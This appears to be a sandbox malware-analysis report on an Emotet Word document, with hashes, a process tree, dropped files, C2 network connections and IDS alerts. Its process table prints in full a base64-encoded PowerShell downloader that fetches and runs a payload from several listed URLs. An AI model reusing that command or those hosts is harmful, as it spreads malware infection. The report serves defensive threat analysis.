File name: | Malicious0.doc |
Full analysis: | https://app.any.run/tasks/674f7c81-f317-4587-a804-a73eab251c20 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 15:00:22 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Nihil mollitia vel., Author: Bronislava Tomkov, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 8 13:05:00 2019, Last Saved Time/Date: Fri Nov 8 13:05:00 2019, Number of Pages: 1, Number of Words: 20, Number of Characters: 115, Security: 0 |
MD5: | C2EB43D9B9C97C9AB98BE85878CC9906 |
SHA1: | 13C10C719A44D5DB73262E3D77F7FF8077198A8A |
SHA256: | 807CDF94595BC16A675A853171C4E44236B4D776A1E45A86EF676FA5589231AB |
SSDEEP: | 6144:TXGWwHNaqESzGdD48+akOnN9RcPI0NFUe3d:TXGWma9WGe8+ROn/R+jFld |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
HeadingPairs: |
|
---|---|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 134 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 115 |
Words: | 20 |
Pages: | 1 |
ModifyDate: | 2019:11:08 13:05:00 |
CreateDate: | 2019:11:08 13:05:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Bronislava Tomková |
Subject: | - |
Title: | Nihil mollitia vel. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2232 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Malicious0.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3796 | powershell -enco JABMAGQAdgBzAHgAdwBiAHYAcQBmAHYAPQAnAEQAcABrAHQAeQB5AHoAaAAnADsAJABMAHAAZgBvAHgAZQBxAGQAegBhACAAPQAgACcAMgA3ADUAJwA7ACQAQwBsAGEAbABjAGUAdQBxAD0AJwBWAGMAaQBoAHoAYwB3AGoAdgBmAHQAZwBsACcAOwAkAEgAdAByAGUAbgBoAGcAZQB6AHcAegB5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAHAAZgBvAHgAZQBxAGQAegBhACsAJwAuAGUAeABlACcAOwAkAEcAawBhAGMAcwBpAGUAdQB1AHEAbQA9ACcAVABtAGwAZgBtAGYAaABtAGIAbQB6ACcAOwAkAEkAegBmAHcAdAB6AHAAYwBlAD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcAZQBiAGMATABpAGUATgB0ADsAJABBAHgAdgBzAG8AeAB5AG4AZQByAD0AJwBoAHQAdABwAHMAOgAvAC8AYgBsAG8AZwAuAHAAcgBlAHMAcwB3AGUAYgBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AbQBLAGYAbABXADgAWgA5AC8AKgBoAHQAdABwAHMAOgAvAC8AdwBpAGQAZQB3AGUAYgBpAHQALgBjAG8AbQAvAGoAZQBuAHcAZQBkAC8AMABRAHMALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAC4AdwBpAG4AbABpAGYAZQBpAG4AZgBvAHMAeQBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ARQBTADQATQAvACoAaAB0AHQAcABzADoALwAvAHcAbQB2AC4AdgBpAG4AYwBlAHMAawBpAGwAbABpAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANwB4AHAAcgBnAHkAVgB6AGQALwAqAGgAdAB0AHAAcwA6AC8ALwBkAGgAbQBlAGcAYQB2AGkAcwBpAG8AbgAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwA3ADMAbABRAE4AeQBCAE0ALwAnAC4AIgBzAGAAUABsAEkAVAAiACgAJwAqACcAKQA7ACQAWABsAGQAaAB2AGEAZwB2AD0AJwBUAG8AdgBwAHIAaQBvAHEAbgBoAGcAcQAnADsAZgBvAHIAZQBhAGMAaAAoACQAUABzAHUAeQB4AG0AcwB1AHIAaQB6AHkAIABpAG4AIAAkAEEAeAB2AHMAbwB4AHkAbgBlAHIAKQB7AHQAcgB5AHsAJABJAHoAZgB3AHQAegBwAGMAZQAuACIARABvAHcAYABOAGwATwBBAGAARABmAGkATABFACIAKAAkAFAAcwB1AHkAeABtAHMAdQByAGkAegB5ACwAIAAkAEgAdAByAGUAbgBoAGcAZQB6AHcAegB5ACkAOwAkAE8AdABmAG0AZABmAHkAYgBnAHEAawB0AD0AJwBVAGwAcAB1AHgAcwByAHEAcgBwACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASAB0AHIAZQBuAGgAZwBlAHoAdwB6AHkAKQAuACIAbABFAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADIANQAwADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAQQBSAHQAIgAoACQASAB0AHIAZQBuAGgAZwBlAHoAdwB6AHkAKQA7ACQAVgBsAG8AdgBoAGIAagB0AGIAdQA9ACcAUQB2AHMAaABlAGYAeQByAGMAdgBiAHMAJwA7AGIAcgBlAGEAawA7ACQAUgBjAHgAYwBwAHcAegBzAGMAcABzAHUAPQAnAEgAdABzAHEAdQBiAGgAeAB6AGoAbQBrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEsAegBrAHcAagBvAGoAZwB3AHoAPQAnAFQAeABzAGMAcABrAGMAZwBrAGkAYwBrAHgAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
656 | "C:\Users\admin\275.exe" | C:\Users\admin\275.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4092 | --4494506e | C:\Users\admin\275.exe | 275.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2168 | "C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe" | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | — | 275.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3784 | --dfba43e0 | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | wholesspi.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA65C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3796 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2NGQEV1O02NM7EH0KT1K.temp | — | |
MD5:— | SHA256:— | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D3E45E9E34C71A48C10FD945E9620BAF | SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ECD04FAC.wmf | wmf | |
MD5:22EA717261973F18727D0EC1A2FCD48F | SHA256:2BD621DB28BF55DB80244E6C23A5D6482DC14CF47E0D884BFFA02F9C63DA20E8 | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFA4F16E.wmf | wmf | |
MD5:0210131379418D1161044C77D1F1356D | SHA256:8DCD11B543DE72DA4735503BD729557577F43FE8755A23A2E4099376B09EDD83 | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE1E93BD.wmf | wmf | |
MD5:60F56AA86368BD6E1CFE32D68B2E681F | SHA256:4E8FF14CFEEB41A1DC8349F147E6E0E746D32777FE2A4789C0CA295A459FDFAB | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13DFCE9A.wmf | wmf | |
MD5:AD6DC966B678E895D4DF89C166809FC7 | SHA256:B1D25E6260EC5A2D8EDA08FC0B0F1FD68A8573272D9E8056B8A2F27F2B760C5F | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:0F96B425727F9C848B66EBE7C57575E6 | SHA256:BC7F7CAD6B247EA440897FFE5DED9F028868D67D9FDCC0C19F82709FBE9F82AD | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37501697.wmf | wmf | |
MD5:D36204EBB927DB50E32BF1908296F092 | SHA256:ACBF3A297C49801660222604E4A07C2DD5BC76E563F4E88455E1635A343A8276 | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5BB8D9D3.wmf | wmf | |
MD5:727F0179A173BB236CC24D409D3C687F | SHA256:78B213615AAED2E04B24EC4FAF22582C63E9A6529BF96A407C8A056EDA7FBF5D |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3784 | wholesspi.exe | POST | — | 165.227.156.155:443 | http://165.227.156.155:443/site/cone/ | DE | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3796 | powershell.exe | 192.241.189.146:443 | blog.presswebs.com | Digital Ocean, Inc. | US | unknown |
3784 | wholesspi.exe | 74.208.125.192:443 | — | 1&1 Internet SE | US | malicious |
3784 | wholesspi.exe | 165.227.156.155:443 | — | Digital Ocean, Inc. | DE | malicious |
3796 | powershell.exe | 104.31.88.48:443 | widewebit.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
blog.presswebs.com |
| unknown |
widewebit.com |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3784 | wholesspi.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 4 |
3784 | wholesspi.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3784 | wholesspi.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3784 | wholesspi.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |